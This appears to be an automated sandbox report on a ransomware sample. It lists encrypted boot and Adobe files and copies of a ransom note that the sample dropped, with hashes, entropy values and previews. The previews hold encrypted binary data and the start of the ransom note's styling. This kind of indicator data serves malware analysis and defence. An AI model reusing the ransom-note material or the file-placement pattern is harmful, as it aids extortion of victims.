                                    SHA-256:A0F97EFBDB2EEE752AF45A50721CA0975F82B1EDA11444FA2F7E18E874AF0858
                                    SHA-512:D386A225871F1F7CC57EE884580535F0186F8ADCB7BC3DB7D23956BEA3E68C1D40EE13F0B3D9B2829AC7EC49ECC75170617AAA4E888961FCC961ECEBA243BD74
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z.....&...X....j_.\..-..E&.}.:gqXa.n..B/5.K...?.E.[.W#JF.......R....B_m..mf.X.p4..V. ....zp.V.....s^..fa.......:@.%...S..W.q....UM.W.aG...Ix...p.....`.....'..s..c...L.........|.nC^..qX.._.....8[..I..d.....?..0..&..?....e.l.c..w..:.k%..(-..g#.Y..z.w.6..WR.F9.n.$.5...h.-d.=.8bI[..UM.....b...L......._...*,b........8....H..1.j.{:...bv.M.|....Y}...".I.k.f..k....(3..lM.O_.....n.u..tAd.Nomc*.<^...R.....b0X.7....8./`B....?S....4g...(.wC.F..7..^`...'...y..7.S....[..i.Wn)E:lM(0......L.9.&...%.=..o...u.vVW...~..kG.+.Q.Y."a..N.,..o..3..X.....g|..B.......i.4p+JCK.7...T9..<A....J..0....=YA..^...*N.`..k....RX.1.B.R.....U<n..........A.._...g#%m..*...e,gR.2N.70..>h.....@.E.-.h...;..n.=.[~...X.m......

                                    C:\EFI\Microsoft\Boot\da-DK\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996178586060663
                                    Encrypted:true
                                    SSDEEP:768:C+qE5SDaesvbCEGiThLC8FMyxayEIgrEULoEJyQ5b9p6DyDXLQ1eTX7XW6yOH/hs:Cae6Thm8MDIgrEVEcgb9geLTLVznCfX
                                    MD5:CADF34548F20A0F3D9891D55BFE4A9BC
                                    SHA1:D99BE55438D04BF89CED02C67BCA3DE3EF89C2A9
                                    SHA-256:7D53490F5265BF1996924D59401A069F0F8ECDFAE10ADAF9F5A5D20E7D577456
                                    SHA-512:DAED53C25B3A8306B4180BF48A0EAFBF7F352440E21D2B4B9A6B270AD96E2EEFE4F1E28E90802839AD8BA83E966083306473D7FA35AF0E756A75130EF6086F17
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3.......5.^5^h....5.....eb0.'......n.z..F2D...."..... ......{2...l.4h.P..L..J.E.O..9..tp.R...n@.2|.......W..Ar)..o..q~-4.......q..1G#..R...N@.4.6.OP`..D...IX...[......#$..}!0(.#...OR...\aL...."...?dx...7jwY[.[?.....x8...=._.=:.....!1?.......%...XCx.z...........&.}(.*}Y.N......`sC....C......(..h4i.h..l..lh.f..D8;.h.Z./.....}v1",..r.......}...Ke....).k...gz_....,......V$.].#D...PkBK.F.Cz......-/?.m+./;.z...%.*..R.{..MW...3.7QlN..g&.+.]...f.......U|I^...jk.u.+,.Jl....n.7.h...#..PB...Rr:..+fIl.>....L.i.j...F%[.A4.........N..Bi..j.Z...X..?H..,.[..6.I..jU....t=N..s..B..qz........7..zc..@..{....M.VU9G.L.YQBd<..._.Gp...uI.I...ha.5.K........$u....;.6.0....ut...R^^.....%..$..*...s~............,.q.

                                    C:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.998205419992001
                                    Encrypted:true
                                    SSDEEP:1536:dI6fi5OadHXDwx7zoB1eYRNfLaLnW1R8FQXVSHZQZm9Lo9daGekOrMjhxAmJYhl5:dVKMaHzRB1eYR8r9+VSHo9dTxOahHJYZ
                                    MD5:65CFC587ED38CFF0305427CCA99479FB
                                    SHA1:573701A66FF6B76390EBFB6DBB622EA48F3F6313
                                    SHA-256:4B5F5F67C3926BC9FACD5F49515382D007FFDBB19458BAF38E36D1A934847DA9
                                    SHA-512:CE93FF34A8C3D53F1100FF2EC8302147C1F1FA22C2504A8196D198CD582991A07FC62A55EF3ECCBFCD14D7179EE967FB95564497CE58C39CD6F88C1BC6141B8D
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s...NE!..T....)..m/<.-.]..R_.1k........#....i.u;..xu........7.W..x.....i..VJ.......AP.{.."...[...._.....U..........w.J.I."j4...4....!.....UMqp.'.P......#b!....p..p.....dm..m...D*.g..5.(q....C4#....".q'7..._..........5..'.....?.E..7.. i...sF....`&....dQ..Bh3D1....3....y...bP...o\.....,[.V...y..[.`x?>.z>.^. N(.b....4f.).F..8.....~J. ...a..R.......[uY.b-.q0..D.g&E.6..g..h@....h....!..\......vV..c...N.%.9....2SIQn..X..A.'.].;xC../.&..o. ...cj...@.D..h..w.....@...x.....O........b.>.a.Ax.Wv'.#.L..f...}|WI.({~f..&F.BN..P...2q6.".k._t.n.p....t....zB.......~.x..t..I....f....9o5|>"...A#..{....~rV.6(.5W........-.]e......R.*.X...+x.p.>.J.D.+7tzz0.......C......l....y..n.<.K%.3.>.~..`....Si%..:.]..i..I.

                                    C:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997618400259809
                                    Encrypted:true
                                    SSDEEP:1536:vPOZmhIEy39lfsZogbX1fFVLQ58fbtK/r8JBSn+qZflTI6+tIqLDLmT5co+V/uLy:3eGIEcD02GX1lzo82plNzT5co+d2y
                                    MD5:A0C8D45C64147AD8F5D271297D933566
                                    SHA1:254A17AE38F420F7983A128CA6C417B5C8FEDEFD
                                    SHA-256:FF25DB5B3EE3A5C2281AB85A88F530C24DF73182CFA5713AF09B202559B8ED2D
                                    SHA-512:2F414E2BB9FC507F28AF2D3306913992D6DEFF5399073BDD55A7D1E417128A5ABE0342637BC10F858FD2FC21C43E450773DEE7BE73277D2E4F4485BBA175A922
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s.......d...d...y....j.F.M.N.P.Gxc..N....9.....W....:.[^.......T.B....$#.w.Z_.y..>.v.......n.?...]F...WE...0....{g...-.Zy...8AR[.hu...5ZR....G?...3..t.,.O_.N........Db.J."0...rl~..?O..u..f...0.......}q.......s.].h..1..&...fP.....}70.Z.y....J.$=..p.TS..*......~6....R.C...5}.H..` k.e..B..<.....,.....,....E..,g..; 0.^Z.`....Z.9.2...g..1c..0A.~..<0/.\..Xp.+..<"..*a.V.a.x`._.>.G.."...}.CJ....IK....$i.X&.q...tF..A7!.ms$v%.PP_.N...M...j..+n.lw.....#..r....{1.i6.Z4<.P.......h\=.V.(...4.#..H..|.'...@s........<..........{.c.&B...2S{^.$1...8.O`.\.....q.../..|..k.`Z..\..>P..i.o.....X.U..F.....T..#.d.q~.hP.N.+K..-.W.9..D...su.CTa.E.'_{..~.u.*....4..^M......>k....xO.Xz.......G.Y.w..{.(....t....R,]C.Y.V

                                    C:\EFI\Microsoft\Boot\de-DE\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996494406237935
                                    Encrypted:true
                                    SSDEEP:768:l1Ksz6voufacvtxxcq8rTYvSeetIEZfd18N2aMzYj1I3lisjd4vH:+smfRtxxFShNd1TzyI3QsB0H
                                    MD5:F2C396DF9DE478E729E6C66FC4E5A033
                                    SHA1:9526982D6795DB6EE9F8D29C1B1F121F868A1D9F
                                    SHA-256:45BE2255EC77F5218F1E8E53DB62FF0ED28809F2E43DAC78042C693B4F9D7B4B
                                    SHA-512:10ED7648672A29E0AAE03C15A6FF2F985D9265454DC76772170EC4A8144EDB40702E764BC82A9B924390C97CE7029C9DF54293782EAFB6AFFE2AD8C30C6D0E73
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..;.K........<...s.`.;B5...."|F.J..mw...&(.R.Q:..^...+.V..?.z..)1....../.^f.zj.l.%.`"/t...1.t7...2.b~@..d~.%...H.....I.t.j...cJ?"H'l.Cf..q.....#....1...o.......J.....]HI......j.......b.R..b....e|.q......n.d'Z=."4."&.y.Ce*.Pt.,.s...b...J.#....K.......XF..f3..$...B..j.\Mv.C.4`e......O"......"}....H^...3.V.y...f..(.'.|...F.N...,Z)"..%....;.F.b...f.].1_>.F*}y:$]..;56.6.=a..\\..{.w....Z.....v.@J....|c.$A..]>..'..w+.....9./.......+x..d.[....c..t/x.Qw....[......V[..-O.:...,5J.m[..{v.;&bv./..2.q.l...5.P...XG...|'....v..;...[.Q......h....C...m..[.)..-.#..I......E.. ...F.R-..oZ....|l...Qy...j^5=+D...K.y3..Q6.....g...E..(..M..u...>.(.YsO.....$...9*?....D<.~..!.'...z.;./q...wX.<..H.....'.cb`N.....po..x....R].D...T`..(....aW...S %.j........

                                    C:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997460280988206
                                    Encrypted:true
                                    SSDEEP:1536:l9X9A2v9Nf5UMZQCIus4I415NYkt8fbiIRb0kiT9Zy7yLPbZgQIJEY80GvD3:++NfmkkQI415miEIkgE7eVgQrb0aL
                                    MD5:08908AB6D9CB30C818DEA8D2D4EDA057
                                    SHA1:F1E311644F00369B2BFB662811ECE31B4F6CEAAF
                                    SHA-256:B27E5B95954B6F095382B71074F5FD2BDBE1F181D82B53DF79DEB9F686715974
                                    SHA-512:F46BA8CE507EFAB136B2CDE01AB08D30B6CF04266214B1051983D588FCC8BB1B3E4B1648691C61426D841BD6A7710FC81833F9002D0D25379EA2C0959CC39E52
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....&n..p...1.a.X...9b...^....n..o.@L..E.P.We....,...%.-......=hx2i..I.z..J..8=..X#".j........K........!?$.bY........h.e.}8.Wf.P..!P...s..k.-.v...WV"...}K.e.A..R\.`...)7F].v...(...%+........Y...HK.4...U7.]GB..,.Ij....(F...F.../o...V)...>y.....4.B)l*.'.......$.Y5.....-*........>.o.. ...>. ......3qR.y..(.|rv..{....Mk..(.m....Yx`Fq......K.d~..?..'4-..6...(...;.)..3....y.g.\.8....jVC@.%}..N.}.......-.O/M.a1U....b.....B}x...5B/..p.t=f...+`.l........_..r...V$.....Z..g(.u........P.V5....5.R/.W..S.5.d]..9.C...]u....)B..9..[....!,..s.%....mZ.V)..=......I%...^.v.wyw..M&.M..E.2N..l....;..*........8............z..Y5...@U._.s.....R/.s.-|.....r.....o./8j........~..3/.]N...[Q.X...(.....(&^.tc..p.{,.'.S5sk......=...5.7.J.4........ux...a).$..#

                                    C:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997723125585943
                                    Encrypted:true
                                    SSDEEP:1536:1yfZtxihuYfoXZk+7WPGJewdsEsu1q2metHwyp6OMFPIaKbP6xHDUKD:QBUmHWPGowdsEJUutQGZMFgaKj2HDUKD
                                    MD5:4E4C052CA08069AD3F7216BDC554D467
                                    SHA1:A5F060BB626E8CFA7999C48231F8D7542BE8ACDC
                                    SHA-256:1A0F59E9726A79749B9681ADDFDB7B69E5FA445AD52759391F3322F5FDC3C1D9
                                    SHA-512:E7CC6EB9EC02E7D308B9ECCD2D725DC52D3172BB9594ECE0621DBE932BDE4B56831B4216CB54D42A7CC12A54A29AF8CACE21B85657E19D20066DD21F83AAC431
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....&n..p...1.a.X...9b...^....n..o.@L..E.P.We....B.1:S..^.Q.a.q.(..3z.ff^...5..^1.7;h.Y...G@.6.\Us.W......5:.>.b...k..2.Kj([..O......:V.{....}-........`E....6.....}in*C..O..rU..B.7.H5[.s}..#v......]t..=>=B!.G_,{..1@m......".......C.fn..lY....t.js.(@.....v<r..q..MdM..g..nN2. .Yu~O.C...5.5n.Q....t....&.....:n...be..........l..~h(.T+.(.6by6*^u...bC.......6..&.....Vn.W....&..DNDd)...7t...Z.oX.7@.].+ZN.*..y|..M0`..y.k.2.....P....5l.UWV.5....nS...u..1V..&...<.1z8T./o...h..Z..t....Z...^....<.............,G.?....?$....,(.......@.....~. ..[\...j..U.....$.........:G..!m.sU.aQUE..6.t......\...?.....w".u.SL...#.lz....=.}|u~..bP.@HM..&s..j...T9VP...1o..=....3.c\+.&....f...gA.?..V>.I......H........?_Y..T.OD&......+.-M.)D....'U7.../..<....&V..TK

                                    C:\EFI\Microsoft\Boot\el-GR\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:false
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.995827959658683
                                    Encrypted:true
                                    SSDEEP:1536:HbUmdHW5qzr9zf3m8FU9FIuk2kdgJNHT36U:baqz5F2FIuDk+jH2U
                                    MD5:04B285DD28D761E09E245EE6217054A5
                                    SHA1:3D1243C6D0EA819676AEB8BBFE17456237611AB0
                                    SHA-256:E9F361121CD01573F390394154D9A56E9EE1E3E2C2C5F6EADEB944AD77AAC9DC
                                    SHA-512:DD3A8B3B4E179BCF6597072F9CBFB9AA848C41657712C5B630AB7E7CBDB0B2839E8A98956E1A10B859B17294D0443D5A00E6EB35F5EE81AC8EBB83B91059DE67
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..9"....;..>.M.s*..E.j.f..P..e].o,}..F..:..6.{.n......V.y..dl..0...Q...\k_.?..vA.tb....'.r.dM..k.D..i....h..c...*.7..8....9..E.z...h...K.#Q.o...3..e.8.I.....>.1./...C@..$..[.y....HF..Ac..)..b..4..l].AN..HIC.ou?..j.`.x.W..........9.3.!.&..c.k.....[L..i46O.)E>...|..........9u...'.H...I.G....d...V.@M.."=.r.k..d..>.L...eyJ.8Sf.../.\~;(......dc.a'.R..).e.....#...y`..y.2uE=..Z*..pPz..L......sSv6...m^.M..=LE...<O.I..w.J.Z../.2.O..?.C...i....].O/^$.^...6.j......P1#...p..............X.*.ko@.5..F#p~...^s#...T7Ga8.H"......mG*G@.`..3JN......B.qR.N!..g..f.<..... .7.&.a.<]..LN...*....Xq...N.......W.I.I.-.x.....3.].O...X..u8..3]:..W.......(..f.ed.../h...E..Z&.ne.D.*....0.....L.M..)..v.u18&3|...a,..]C...~...1_...-.Q..j...K.0;8}._E....H?...k...u.../..

                                    C:\EFI\Microsoft\Boot\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):991768
                                    Entropy (8bit):7.9998129773584585
                                    Encrypted:true
                                    SSDEEP:24576:uX5m4G1rn8Lxf+qgv16g76I2ViwcquUtdB8ZXIt9oM4vWA/RNwhtA:uJi1rnsAzkwgiwcM+cSlvZ/aW
                                    MD5:DC2B924DFC42C115EB70B13483F60EBC
                                    SHA1:602228E32E3EF8ABFA9DB0DC1F8B8E5E0D5EA1EF
                                    SHA-256:25BF6ED8484F044C1D1D3DD641B58448A9B14A8296863895D83F186A449FB094
                                    SHA-512:C7F666BA5AFCC050861B9A412FA5DD131B6D10603C04F9F9ED9C74392AB75AD347CAD1E640820587EA8EAC697500B31C78880915207B2AA2807BAE8EB130F2A6
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]....Q..l.....O.......h.....x.F..~]...L.l.....~.O.M......'...l............9h....C...F./qj..v.c.......1....K...J%.e...! qOCY.....6l.....u4....l....]g.._..cA.q.3...S.(.L....CN.@...v..|b..-5dZ_g.(..5.0.(K.s}RX.A.......j..l...i..hf........5...4B QDO....f.D......Bd......Q....."/-.....5#*1.....s....'._.........|...oL......w}|..>VN.P.&a.o<.:..cS{..R.x........'[.P....:...+...............#G.a...{...=.....`.kI.\...._.O.Xk.X....H&.e....)....M....~......j...+...).I.y..3...W^......3.j..=......w.L...p..~a...!.Z...{...f//..K;.....y..,...y"..|.@p1....xS]......$.Mx.e.ea..v:[@|....X..f....|.!..A.*..*.;....WB1........[.{<..E^.s...:........*..BM..O.^;B....|...7...63.zb...`.....}.H.^...K..a..u...L}8.....V.(c.......D...$.e...s.;f..b.$.3K:..!.0'7..*. .U....s.|. ....pi.q.8.eAB..~.rI....]..c..l[..w..F.v..G..e1...yv..`/....)S.5..J,..M/.H.H..}......2..*w...d.B6DJ..A....u...(.b$5QC{.@..I..HJ.GC..[....!..ncD.u8.A.~...(.?_.".a

                                    C:\ProgramData\Adobe\ARM\S\436\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16920
                                    Entropy (8bit):7.988589241739158
                                    Encrypted:false
                                    SSDEEP:384:12XWbvM2KjMYgIpTdZ/i9uB002Qyl1HpDwJqWgbWCHoc8VsJ2I/BY:1GOvM2bYgiTd1iEHyF0JqWgbWCIc8Vsy
                                    MD5:BBE2F027562F3D8783AD89517CA24D5F
                                    SHA1:C6ACEEBB743B2C442804EC108BC7245A09C347F1
                                    SHA-256:4019B9B7FD1D3F9A06BE7466D5D13122942FBAAA30094BC4D93A96B6EB05CFD8
                                    SHA-512:F10C5822448080421BBC897F081665F070FE975B45298EBF7A95861B6D255F90356431B2E6DB20AFF9EAD0CB4416970193C2C3224026FDFD5162DD9112CB6928
                                    Malicious:false
